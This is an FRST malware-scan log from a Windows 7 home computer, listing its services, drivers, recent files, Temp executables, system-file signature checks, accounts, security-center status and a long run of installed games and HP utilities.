CHR Extension: (Chrome Web Store Payments) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-11-26]
CHR Extension: (Trend Micro Toolbar) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\ohhcpmplhhiiaoiddkfboafbhiknefdf [2016-11-26]
CHR Extension: (Gmail) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-11-26]
CHR Extension: (Chrome Media Router) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2016-11-26]
CHR HKLM-x32\...\Chrome\Extension: [ohhcpmplhhiiaoiddkfboafbhiknefdf] - hxxps://clients2.google.com/service/update2/crx

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 hpqcaslwmiex; C:\Program Files (x86)\HP\Shared\hpqwmiex.exe [1031704 2016-06-03] (HP)
R2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [29728 2016-08-15] (HP Inc.)
R2 kss; C:\Program Files (x86)\Kaspersky Lab\Kaspersky Security Scan\kss.exe [1556448 2015-12-15] (AO Kaspersky Lab)
R2 NOBU; C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe [2804568 2010-06-01] (Symantec Corporation)
R2 ogmservice; C:\Program Files (x86)\Online Games Manager\ogmservice.exe [582544 2016-07-13] (RealNetworks, Inc.)
R2 PGMTrusted; C:\Program Files (x86)\Pogo Games\PGMTrusted.exe [520360 2013-03-25] (iWin Inc.)
R2 Platinum Host Service; C:\Program Files\Trend Micro\Titanium\plugin\Pt\PtSvcHost.exe [1137664 2015-07-16] (Trend Micro Inc.)
R2 PwmSvc; C:\Program Files\Trend Micro\TMIDS\PwmSvc.exe [2458624 2016-09-01] (Trend Micro Inc.)
R2 RtVOsdService; C:\Program Files\Realtek\RtVOsd\RtVOsdService.exe [315392 2010-06-24] (Realtek Semiconductor Corp.) [File not signed]
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)
R2 Amsp; "C:\Program Files\Trend Micro\AMSP\coreServiceShell.exe" coreFrameworkHost.exe -m=rb -dt=60000 -ad -bt=0 [X]

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R0 31DADE60; C:\Windows\System32\drivers\31DADE60.sys [478392 2016-11-26] (Kaspersky Lab ZAO)
R1 tmactmon; C:\Windows\System32\DRIVERS\tmactmon.sys [140504 2016-08-10] (Trend Micro Inc.)
R0 tmcomm; C:\Windows\System32\DRIVERS\tmcomm.sys [332512 2016-08-10] (Trend Micro Inc.)
R0 TMEBC; C:\Windows\System32\DRIVERS\TMEBC64.sys [59712 2015-06-11] (Trend Micro Inc.)
R3 tmeevw; C:\Windows\System32\DRIVERS\tmeevw.sys [116576 2015-06-08] (Trend Micro Inc.)
R1 tmevtmgr; C:\Windows\System32\DRIVERS\tmevtmgr.sys [106720 2016-08-10] (Trend Micro Inc.)
R3 tmnciesc; C:\Windows\System32\DRIVERS\tmnciesc.sys [561952 2016-06-24] (Trend Micro Inc.)
R1 tmumh; C:\Windows\System32\DRIVERS\TMUMH.sys [101088 2016-08-09] (Trend Micro Inc.)
R2 tmusa; C:\Windows\System32\DRIVERS\tmusa.sys [124752 2015-12-09] (Trend Micro Inc.)
R2 X5XSEx_Pr143; C:\Program Files (x86)\Free Ride Games\X5XSEx_Pr143.Sys [56136 2012-08-02] (Exent Technologies Ltd.)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-11-29 18:11 - 2016-11-29 18:13 - 00025837 _____ C:\Users\Owner\Desktop\Addition.txt
2016-11-29 18:07 - 2016-11-29 18:14 - 00028592 _____ C:\Users\Owner\Desktop\FRST.txt
2016-11-29 18:06 - 2016-11-29 18:07 - 00000000 ____D C:\FRST
2016-11-29 18:02 - 2016-11-29 18:02 - 02411520 ____N (Farbar) C:\Users\Owner\Desktop\FRST64.exe
2016-11-29 11:10 - 2016-11-29 11:10 - 00000017 _____ C:\Windows\SysWOW64\shortcut_ex.dat
2016-11-28 14:52 - 2016-11-28 15:10 - 00002216 _____ C:\Users\Owner\Desktop\Play The Chronicles of Emerland Solitaire.lnk
2016-11-26 22:41 - 2016-11-26 22:41 - 00000000 _____ C:\Windows\SysWOW64\sho214.tmp
2016-11-26 22:32 - 2016-11-29 17:50 - 00000000 ____D C:\Users\Owner\AppData\LocalLow\Mozilla
2016-11-26 21:50 - 2016-11-29 16:38 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2016-11-26 19:46 - 2016-11-26 19:47 - 00192216 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2016-11-26 19:45 - 2016-11-26 19:45 - 00001066 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2016-11-26 19:45 - 2016-11-26 19:45 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2016-11-26 19:45 - 2016-11-26 19:45 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2016-11-26 19:45 - 2016-03-10 14:09 - 00064896 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2016-11-26 19:45 - 2016-03-10 14:08 - 00140672 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamchameleon.sys
2016-11-26 19:45 - 2016-03-10 14:08 - 00027008 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys
2016-11-26 14:36 - 2016-11-26 14:45 - 00000000 ____D C:\KVRT_Data
2016-11-26 14:36 - 2016-11-26 14:36 - 00478392 _____ (Kaspersky Lab ZAO) C:\Windows\system32\Drivers\31DADE60.sys
2016-11-26 14:00 - 2016-11-26 14:00 - 00000000 ____D C:\Users\Owner\AppData\Local\CEF
2016-11-26 13:52 - 2016-11-26 13:52 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Kaspersky Software Updater Beta
2016-11-26 13:52 - 2016-11-26 13:52 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Kaspersky Security Scan
2016-11-26 13:52 - 2016-11-26 13:51 - 00001015 _____ C:\Users\Public\Desktop\Kaspersky Security Scan.lnk
2016-11-26 13:51 - 2016-11-26 13:52 - 00000000 ____D C:\ProgramData\Kaspersky Lab
2016-11-26 13:51 - 2016-11-26 13:52 - 00000000 ____D C:\Program Files (x86)\Kaspersky Lab
2016-11-26 13:49 - 2016-11-26 13:50 - 00000000 ____D C:\ProgramData\Kaspersky Lab Setup Files
2016-11-26 13:48 - 2016-11-26 13:48 - 02622304 _____ (Kaspersky Lab) C:\Users\Owner\Downloads\kss16.0.0.1344en_9702.exe
2016-11-26 13:45 - 2016-11-26 13:49 - 00211378 _____ C:\TDSSKiller.3.1.0.12_26.11.2016_13.45.18_log.txt
2016-11-26 13:44 - 2016-11-26 13:45 - 04747704 _____ (AO Kaspersky Lab) C:\Users\Owner\Downloads\tdsskiller.exe
2016-11-26 13:27 - 2016-11-26 13:39 - 22851472 _____ (Malwarebytes ) C:\Users\Owner\Downloads\mbam-setup-2.2.1.1043.exe
2016-11-26 13:10 - 2016-11-26 13:10 - 00000000 ____D C:\Users\Owner\AppData\Local\HP_Development_Company,_L
2016-11-26 13:03 - 2016-11-26 13:03 - 00002231 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-11-26 13:03 - 2016-11-26 13:03 - 00002219 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2016-11-26 13:02 - 2016-11-29 18:07 - 00000896 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2016-11-26 13:02 - 2016-11-29 14:28 - 00000892 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2016-11-26 13:02 - 2016-11-26 13:53 - 00000000 ____D C:\Users\Owner\AppData\Local\Google
2016-11-26 13:02 - 2016-11-26 13:03 - 00000000 ____D C:\Program Files (x86)\Google
2016-11-26 13:02 - 2016-11-26 13:02 - 00003892 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2016-11-26 13:02 - 2016-11-26 13:02 - 00003640 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2016-11-26 13:00 - 2016-11-26 13:00 - 01065376 _____ (Google Inc.) C:\Users\Owner\Downloads\ChromeSetup.exe
2016-11-26 05:44 - 2016-11-26 05:44 - 00000000 _____ C:\Windows\SysWOW64\shoAE78.tmp
2016-11-25 18:38 - 2016-11-25 18:38 - 00000000 ____D C:\ProgramData\HP Inc
2016-11-13 01:25 - 2016-11-13 01:56 - 00000000 ____D C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Norton
2016-11-13 01:25 - 2016-11-13 01:26 - 00001303 _____ C:\Users\Owner\Desktop\Norton Installation Files.lnk
2016-11-13 01:25 - 2016-11-13 01:25 - 00000000 ____D C:\Users\Public\Downloads\Norton

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-11-29 18:05 - 2009-07-13 23:45 - 00026192 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2016-11-29 18:05 - 2009-07-13 23:45 - 00026192 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2016-11-29 17:53 - 2012-09-08 13:26 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
2016-11-29 16:38 - 2013-07-16 13:50 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2016-11-29 14:30 - 2016-10-21 23:38 - 00000000 ____D C:\Users\Owner\AppData\Local\DP_Tower_3.7
2016-11-29 14:29 - 2013-06-07 21:03 - 00000000 ____D C:\Users\Owner\AppData\LocalLow\Temp
2016-11-29 14:28 - 2009-07-14 00:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2016-11-29 10:39 - 2016-02-22 09:53 - 00000010 _____ C:\Users\Owner\AppData\Local\sponge.last.runtime.cache
2016-11-29 01:43 - 2013-05-25 16:09 - 00000000 ____D C:\Users\Owner\Desktop\Ginny's Recipes
2016-11-29 01:43 - 2010-10-22 23:19 - 00000000 ____D C:\Users\Owner\AppData\Roaming\SoftGrid Client
2016-11-28 22:59 - 2009-07-14 00:13 - 00783464 _____ C:\Windows\system32\PerfStringBackup.INI
2016-11-28 22:59 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\inf
2016-11-28 15:10 - 2013-08-02 21:08 - 00000000 ____D C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Free Ride Games
2016-11-28 14:52 - 2013-06-07 21:05 - 00000000 ____D C:\Remote Programs
2016-11-26 20:32 - 2015-10-21 19:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2016-11-26 20:32 - 2010-07-11 00:29 - 00000000 ____D C:\Program Files\Java
2016-11-26 20:30 - 2015-10-21 19:55 - 00110144 _____ (Oracle Corporation) C:\Windows\system32\WindowsAccessBridge-64.dll
2016-11-26 20:27 - 2013-08-18 12:38 - 00000000 ____D C:\Program Files (x86)\Java
2016-11-26 20:26 - 2016-10-23 15:30 - 00000000 ____D C:\Users\Owner\AppData\Local\767c1f6b
2016-11-26 20:14 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\TAPI
2016-11-26 19:45 - 2013-07-16 14:09 - 00000000 ____D C:\ProgramData\Malwarebytes
2016-11-26 13:10 - 2016-10-22 00:10 - 00003186 _____ C:\Windows\System32\Tasks\HPCeeScheduleForOwner
2016-11-26 13:10 - 2016-10-22 00:10 - 00000332 _____ C:\Windows\Tasks\HPCeeScheduleForOwner.job
2016-11-26 04:58 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\Help
2016-11-26 04:48 - 2009-07-13 23:45 - 00326960 _____ C:\Windows\system32\FNTCACHE.DAT
2016-11-25 18:37 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\system32\NDF
2016-11-25 18:36 - 2010-10-21 17:26 - 00080416 _____ C:\Users\Owner\AppData\Local\GDIPFONTCACHEV1.DAT
2016-11-25 18:36 - 2010-07-10 22:09 - 00000000 ____D C:\Program Files (x86)\Hewlett-Packard
2016-11-25 18:29 - 2010-07-10 23:08 - 00000000 ____D C:\ProgramData\Hewlett-Packard
2016-11-25 18:20 - 2010-07-10 22:10 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2016-11-25 18:18 - 2010-10-21 17:28 - 00000000 ____D C:\Users\Owner\AppData\Roaming\hpqLog
2016-11-25 18:06 - 2012-05-15 19:43 - 00000000 ____D C:\Program Files (x86)\HP
2016-11-25 16:41 - 2009-09-06 19:40 - 00000000 ____D C:\SwSetup
2016-11-24 04:13 - 2010-07-10 23:08 - 00000000 ____D C:\ProgramData\Temp
2016-11-24 03:43 - 2012-05-15 19:44 - 00000000 ____D C:\Users\Owner\AppData\Roaming\HpUpdate
2016-11-13 01:56 - 2010-09-28 03:51 - 00000000 ____D C:\ProgramData\Norton
2016-11-12 23:53 - 2012-09-08 13:26 - 00796352 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2016-11-12 23:53 - 2012-09-08 13:26 - 00003768 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
2016-11-12 23:53 - 2012-02-20 15:56 - 00000000 ____D C:\Windows\system32\Macromed
2016-11-12 23:53 - 2011-06-15 18:31 - 00142528 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2016-11-12 23:53 - 2010-07-10 22:36 - 00000000 ____D C:\Windows\SysWOW64\Macromed

==================== Files in the root of some directories =======

2013-12-25 01:41 - 2016-05-08 13:39 - 0000458 _____ () C:\Users\Owner\AppData\Roaming\wklnhst.dat
2016-02-22 09:53 - 2016-11-29 10:39 - 0000010 _____ () C:\Users\Owner\AppData\Local\sponge.last.runtime.cache
2012-05-15 19:41 - 2012-05-15 19:41 - 0000057 _____ () C:\ProgramData\Ament.ini
2010-09-28 03:45 - 2010-09-28 03:45 - 0000032 _____ () C:\ProgramData\{051B9612-4D82-42AC-8C63-CD2DCEDC1CB3}.log
2010-07-10 23:57 - 2010-07-10 23:57 - 0000109 _____ () C:\ProgramData\{1FBF6C24-C1FD-4101-A42B-0C564F9E8E79}.log
2010-09-28 03:45 - 2010-09-28 03:45 - 0000032 _____ () C:\ProgramData\{23F3DA62-2D9E-4A69-B8D5-BE8E9E148092}.log
2010-07-10 23:51 - 2010-07-10 23:52 - 0000105 _____ () C:\ProgramData\{40BF1E83-20EB-11D8-97C5-0009C5020658}.log
2010-09-28 03:44 - 2010-09-28 03:44 - 0000032 _____ () C:\ProgramData\{4FC670EB-5F02-4B07-90DB-022B86BFEFD0}.log
2010-09-28 03:45 - 2010-09-28 03:45 - 0000032 _____ () C:\ProgramData\{9867824A-C86D-4A83-8F3C-E7A86BE0AFD3}.log
2010-07-10 23:50 - 2010-07-10 23:51 - 0000107 _____ () C:\ProgramData\{C59C179C-668D-49A9-B6EA-0121CCFC1243}.log
2010-07-10 23:52 - 2010-07-10 23:56 - 0000110 _____ () C:\ProgramData\{CB099890-1D5F-11D5-9EA9-0050BAE317E1}.log
2010-09-28 03:45 - 2010-09-28 03:46 - 0000105 _____ () C:\ProgramData\{d36dd326-7280-11d8-97c8-000129760cbe}.log

Some files in TEMP:
====================
C:\Users\Owner\AppData\Local\Temp\dl1BFF590E-574A-DB44-A7B9-32C75D636C65.exe
C:\Users\Owner\AppData\Local\Temp\Extract.exe
C:\Users\Owner\AppData\Local\Temp\fp_pl_pfs_installer.exe
C:\Users\Owner\AppData\Local\Temp\GenericUninstall.exe
C:\Users\Owner\AppData\Local\Temp\HPHelpUpdater.exe
C:\Users\Owner\AppData\Local\Temp\HPQSi.exe
C:\Users\Owner\AppData\Local\Temp\HPSFUpdater.exe
C:\Users\Owner\AppData\Local\Temp\jre-6u23-windows-i586-iftw-rv.exe
C:\Users\Owner\AppData\Local\Temp\jre-6u24-windows-i586-iftw-rv.exe
C:\Users\Owner\AppData\Local\Temp\jre-6u35-windows-i586-iftw.exe
C:\Users\Owner\AppData\Local\Temp\jre-7u21-windows-i586-iftw.exe
C:\Users\Owner\AppData\Local\Temp\jre-7u25-windows-i586-iftw.exe
C:\Users\Owner\AppData\Local\Temp\jre-7u71-windows-i586-iftw.exe
C:\Users\Owner\AppData\Local\Temp\jre-8u111-windows-au.exe
C:\Users\Owner\AppData\Local\Temp\jre-8u40-windows-au.exe
C:\Users\Owner\AppData\Local\Temp\jre-8u65-windows-au.exe
C:\Users\Owner\AppData\Local\Temp\Resource.exe
C:\Users\Owner\AppData\Local\Temp\SP50498.exe
C:\Users\Owner\AppData\Local\Temp\SP50718.exe
C:\Users\Owner\AppData\Local\Temp\SP50720.exe
C:\Users\Owner\AppData\Local\Temp\SP50979.exe
C:\Users\Owner\AppData\Local\Temp\SP51650.exe
C:\Users\Owner\AppData\Local\Temp\SP51976.exe
C:\Users\Owner\AppData\Local\Temp\sp52110.exe.exe
C:\Users\Owner\AppData\Local\Temp\SP52131.exe
C:\Users\Owner\AppData\Local\Temp\SP52509.exe
C:\Users\Owner\AppData\Local\Temp\SP52598.exe
C:\Users\Owner\AppData\Local\Temp\sp54620.exe
C:\Users\Owner\AppData\Local\Temp\sp58915.exe
C:\Users\Owner\AppData\Local\Temp\sp64126.exe
C:\Users\Owner\AppData\Local\Temp\sphpsa.exe
C:\Users\Owner\AppData\Local\Temp\uninstaller.exe
C:\Users\Owner\AppData\Local\Temp\UninstallHPSA.exe
C:\Users\Owner\AppData\Local\Temp\UninstallHPTCA.exe
C:\Users\Owner\AppData\Local\Temp\ytb.exe
C:\Users\Owner\AppData\Local\Temp\_is751F.exe
C:\Users\Owner\AppData\Local\Temp\_is7F9B.exe

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2016-03-23 17:36

==================== End of FRST.txt ============================

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 27-11-2016
Ran by Owner (29-11-2016 18:16:53)
Running from C:\Users\Owner\Desktop
Windows 7 Home Premium Service Pack 1 (X64) (2010-10-21 21:54:18)
Boot Mode: Normal
==========================================================

==================== Accounts: =============================

Administrator (S-1-5-21-2406275642-2542123288-3132197554-500 - Administrator - Disabled)
Guest (S-1-5-21-2406275642-2542123288-3132197554-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-2406275642-2542123288-3132197554-1002 - Limited - Enabled)
Owner (S-1-5-21-2406275642-2542123288-3132197554-1000 - Administrator - Enabled) => C:\Users\Owner

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Trend Micro Internet Security (Disabled - Up to date) {8242D66F-41BD-4049-C2E6-E578E73B62A0}
AS: Trend Micro Internet Security (Disabled - Up to date) {3923378B-6787-4FC7-F856-DE0A9CBC281D}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

5 Card Slingo Deluxe (HKLM-x32\...\5 Card Slingo Deluxe) (Version: 1.0.9 - funkitron)
Acrobat.com (HKLM-x32\...\{287ECFA4-719A-2143-A09B-D6A12DE54E40}) (Version: 1.6.65 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 1.5.0.7220 - Adobe Systems Inc.)
Adobe Flash Player 23 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 23.0.0.207 - Adobe Systems Incorporated)
Adobe Flash Player 23 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 23.0.0.207 - Adobe Systems Incorporated)
Adobe Reader 9.5.5 MUI (HKLM-x32\...\{AC76BA86-7AD7-FFFF-7B44-A91000000001}) (Version: 9.5.5 - Adobe Systems Incorporated)
Adobe Shockwave Player 11.5 (HKLM-x32\...\{9ECF7817-DB11-4FBA-9DF1-296A578D513A}) (Version: 11.5.7.609 - Adobe Systems, Inc)
Aquascapes (HKLM-x32\...\54e64742d7c097e9a547ec51ec3e33c2) (Version: - GameHouse)
Aquascapes (HKLM-x32\...\BFG-Aquascapes) (Version: - )
Aquascapes Collector's Edition (HKLM-x32\...\Aquascapes Collector's Edition_is1) (Version: 1.0 - Playrix Entertainment)
Aquascapes Collector's Edition (x32 Version: 3.0.2.48 - WildTangent) Hidden
Atheros Driver Installation Program (HKLM-x32\...\{C3A32068-8AB1-4327-BB16-BED9C6219DC7}) (Version: 9.2 - Atheros)
ATI Catalyst Install Manager (HKLM\...\{ECD0D4B5-FFA9-6E1B-A08D-58E82EA5EEB9}) (Version: 3.0.765.0 - ATI Technologies, Inc.)
Barn Yarn Collector's Edition (HKLM-x32\...\Barn Yarn Collector's Edition_is1) (Version: 1.0 - Playrix Entertainment)
Bejeweled 2 Deluxe (x32 Version: 2.2.0.95 - WildTangent) Hidden
Big Fish Games: Game Manager (HKLM-x32\...\BFGC) (Version: 3.0.1.60 - )
Bing Bar (HKLM-x32\...\{77F8A71E-3515-4832-B8B2-2F1EDBD2E0F1}) (Version: 7.0.609.0 - Microsoft Corporation)
Bing Rewards Client Installer (x32 Version: 16.0.345.0 - Microsoft Corporation) Hidden
Blackhawk Striker 2 (x32 Version: 2.2.0.95 - WildTangent) Hidden
Build-a-lot 2 (x32 Version: 2.2.0.95 - WildTangent) Hidden
Bumper Deluxe (HKLM-x32\...\Bumper Deluxe) (Version: - funkitron)
ccc-core-static (x32 Version: 2010.0617.855.14122 - ATI) Hidden
Chainz 2 Relinked (HKLM-x32\...\exent_663050) (Version: - )
Chuzzle Deluxe (x32 Version: 2.2.0.95 - WildTangent) Hidden
CinemaNow Media Manager (HKLM-x32\...\{6C122441-1861-4CD7-B1C5-A163A6984E12}) (Version: 1.9.1.105 - CinemaNow, Inc.)
Cisco EAP-FAST Module (HKLM-x32\...\{64BF0187-F3D2-498B-99EA-163AF9AE6EC9}) (Version: 2.2.14 - Cisco Systems, Inc.)
Cisco LEAP Module (HKLM-x32\...\{51C7AD07-C3F6-4635-8E8A-231306D810FE}) (Version: 1.0.19 - Cisco Systems, Inc.)
Cisco PEAP Module (HKLM-x32\...\{ED5776D5-59B4-46B7-AF81-5F2D94D7C640}) (Version: 1.1.6 - Cisco Systems, Inc.)
Clutter II - He Said, She Said (HKLM-x32\...\310fe0ed83e67ea82706269a05741425) (Version: - )
Coupon Printer for Windows (HKLM-x32\...\Coupon Printer for Windows5.0.0.0) (Version: 5.0.0.0 - Coupons.com Incorporated)
CyberLink DVD Suite (HKLM-x32\...\InstallShield_{1FBF6C24-C1FD-4101-A42B-0C564F9E8E79}) (Version: 7.0.3003 - CyberLink Corp.)
CyberLink MediaShow (HKLM-x32\...\InstallShield_{80E158EA-7181-40FE-A701-301CE6BE64AB}) (Version: 5.0.1616 - CyberLink Corp.)
CyberLink PowerDVD 9 (HKLM-x32\...\InstallShield_{A8516AC9-AAF1-47F9-9766-03E2D4CDBCF8}) (Version: 9.0.1.4217 - CyberLink Corp.)
CyberLink YouCam (HKLM-x32\...\InstallShield_{01FB4998-33C4-4431-85ED-079E3EEFE75D}) (Version: 3.0.2511 - CyberLink Corp.)
Delicious - Emily's Wonder Wedding Premium Edition (HKLM-x32\...\65a10d0b2572fd789018429552e72c01) (Version: - )
Diner Dash 2 Restaurant Rescue (x32 Version: 2.2.0.95 - WildTangent) Hidden
Dora's Carnival Adventure (x32 Version: 2.2.0.95 - WildTangent) Hidden
Energy Star Digital Logo (HKLM-x32\...\{BD1A34C9-4764-4F79-AE1F-112F8C89D3D4}) (Version: 1.0.1 - Hewlett-Packard)
Escape Rosecliff Island (x32 Version: 2.2.0.95 - WildTangent) Hidden
ESU for Microsoft Windows 7 (HKLM-x32\...\{3877C901-7B90-4727-A639-B6ED2DD59D43}) (Version: 1.0.0 - Hewlett-Packard)
FATE (x32 Version: 2.2.0.95 - WildTangent) Hidden
Final Drive Nitro (x32 Version: 2.2.0.95 - WildTangent) Hidden
Finding Hope (HKLM-x32\...\d21f1d9cc71efcf517e3da1e18d36787) (Version: - GameHouse)
Fishdom (remove only) (HKLM-x32\...\Fishdom) (Version: - )
Fishdom 3 (HKLM-x32\...\f787ff3ddadc8b46619e8324fac303ec) (Version: - )
Fishdom H2O - Hidden Odyssey™ (remove only) (HKLM-x32\...\Fishdom H2O - Hidden Odyssey™) (Version: - )
Fishdom™ 2 (HKLM-x32\...\22c5079ca968caf972807e4c92a273cc) (Version: - )
Five Card Frenzy (HKLM-x32\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7}) (Version: - Oberon Media)
Free Ride Games Player (HKLM-x32\...\{2B7BDADB-EC8C-4C54-B5DD-CE45A016D3A7}) (Version: - Exent Technologies Ltd) <==== ATTENTION
GamesBar 1.1.0.5 (HKLM-x32\...\GamesBar) (Version: - Oberon Media, Inc.)
Gardenscapes (HKLM-x32\...\Gardenscapes_is1) (Version: 1.0 - Playrix Entertainment)
Gold Miner Vegas (HKLM-x32\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-113644907}) (Version: - Oberon Media)
Gold Miner Vegas (HKLM-x32\...\BFG-Gold Miner Vegas) (Version: - )
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 54.0.2840.99 - Google Inc.)
Google Update Helper (x32 Version: 1.3.31.5 - Google Inc.) Hidden
Heroes of Hellas 2 - Olympia (x32 Version: 2.2.0.95 - WildTangent) Hidden
Hewlett-Packard ACLM.NET v1.2.2.3 (x32 Version: 1.00.0000 - Hewlett-Packard Company) Hidden
Hidden Object Crosswords (HKLM-x32\...\27054fe294c730c6d79be8b9c312346e) (Version: - )
HP Advisor (HKLM-x32\...\{40FB8D7C-6FF8-4AF2-BC8B-0B1DB32AF04B}) (Version: 3.4.10262.3295 - Hewlett-Packard)
HP Documentation (HKLM-x32\...\{5E25081D-9CB4-4B17-AD2B-8DF2DC335E85}) (Version: 1.1.1.0 - Hewlett-Packard)
HP Games (HKLM-x32\...\WildTangent hp Master Uninstall) (Version: 1.0.2.5 - WildTangent)
HP MediaSmart CinemaNow 2.0 (HKLM-x32\...\{9008D736-35CA-40DB-A2BE-5F32D954E5AA}) (Version: 2.0 - Hewlett-Packard)
HP Photo Creations (HKLM-x32\...\HP Photo Creations) (Version: 1.0.0.3611 - HP Photo Creations Powered by RocketLife)
HP Photosmart 7510 series Basic Device Software (HKLM\...\{0446B95B-C0FD-4DE9-BD8E-76015D05E4F3}) (Version: 25.0.617.0 - Hewlett-Packard Co.)
HP Photosmart 7510 series Help (HKLM-x32\...\{6357D25F-A9C9-4CC7-A1FB-0DCF344E7C40}) (Version: 140.0.2.2 - Hewlett Packard)
HP Photosmart 7510 series Product Improvement Study (HKLM\...\{D9F55AA1-FD3E-47FF-A385-72ED53666D3F}) (Version: 25.0.617.0 - Hewlett-Packard Co.)
HP Power Manager (HKLM-x32\...\{4B156358-CE9C-4E9F-8CAD-79AE86A68C60}) (Version: 1.0.3 - Hewlett-Packard Company)
HP Quick Launch (HKLM-x32\...\{EB58480C-0721-483C-B354-9D35A147999F}) (Version: 2.3.6 - Hewlett-Packard Company)
HP Setup (HKLM-x32\...\{72D90DB3-A16A-4545-B555-868471101833}) (Version: 8.1.4186.3400 - Hewlett-Packard)
HP Software Framework (HKLM-x32\...\{97174E88-52F9-445A-A28E-704A45332D19}) (Version: 4.0.108.1 - Hewlett-Packard Company)
HP Support Assistant (HKLM-x32\...\{56D27851-B9A6-430F-875A-E2D7A3802C7B}) (Version: 8.3.34.7 - HP Inc.)
HP Support Solutions Framework (HKLM-x32\...\{E7F7C2F3-0BEF-471A-A6F3-4B43002034F4}) (Version: 12.5.32.37 - HP Inc.)
HP Update (HKLM-x32\...\{85DF2EED-08BC-46FB-90DA-28B0D0A8E8A8}) (Version: 5.003.000.004 - Hewlett-Packard)
HP Wireless Assistant (HKLM\...\{B5FC1E1B-E70D-45F1-8E40-A3C30698B323}) (Version: 4.0.9.0 - Hewlett-Packard Company)
Insaniquarium Deluxe (x32 Version: 2.2.0.95 - WildTangent) Hidden
